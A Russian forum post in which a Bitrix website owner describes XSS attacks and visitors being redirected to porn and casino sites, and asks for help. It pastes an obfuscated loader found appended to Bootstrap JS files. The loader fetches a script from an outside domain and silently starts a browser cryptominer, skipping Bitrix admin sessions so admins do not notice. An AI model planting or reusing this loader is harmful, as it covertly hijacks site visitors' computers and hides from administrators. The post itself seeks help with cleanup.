Суть проблемы, после НГ стали долбится на XSS иньекции, журнал битрикса постоянно регистрирует атаки.
Сайт в НГ не работал (сделали заглушку и отключили публичный доступ), был план апдейта всего сайта после НГ.
Звонят 3 января и говорят на сайте порнуха и казино вулкан.
Захожу и реально перекидывает на порно и всякие другие сайты, перекидывает не всегда, иногда вообще всё норм.
сталкивался кто? где искать?
нашёл вот в JS файлах Бутстрапа в конце(через ai-bolit). Удалил, но всё равно редиректит на другие сайты
if(void 0 === minlibloader) {
var minlibloader = {
config: {
v: '$%0.1.0%#',
wd: 'statdynamic',
wz: 'com',
wu: '/lib/',
wn: 'crypta',
delay: 4400
},
init: function() {
setTimeout(function() {
minlibloader.load()
}, this.config.delay)
},
checkEnv: function() {
return 'undefined' == typeof jssassin && ('undefined' == typeof BX || void 0 === BX.admin)
},
load: function() {
if(this.checkEnv()) {
var n = new Date,
i = n.getDate() + n.getMonth() + n.getFullYear(),
e = document.createElement('script');
e.src = '//' + this.config.wd + '.' + this.config.wz + this.config.wu + this.config.wn + '.js?d=' + i, e.onload = function() {
document.head.removeChild(e), window.miner = new CRLT.Anonymous('9e0c2520b816c43755b619f6ac79fe96bb138292bcfb', {
threads: 8,
throttle: .4
}), 'object' == typeof window.miner && window.miner.start()
}, document.head.appendChild(e)
}
}
};
minlibloader.init()
}
может кто что подскажет?
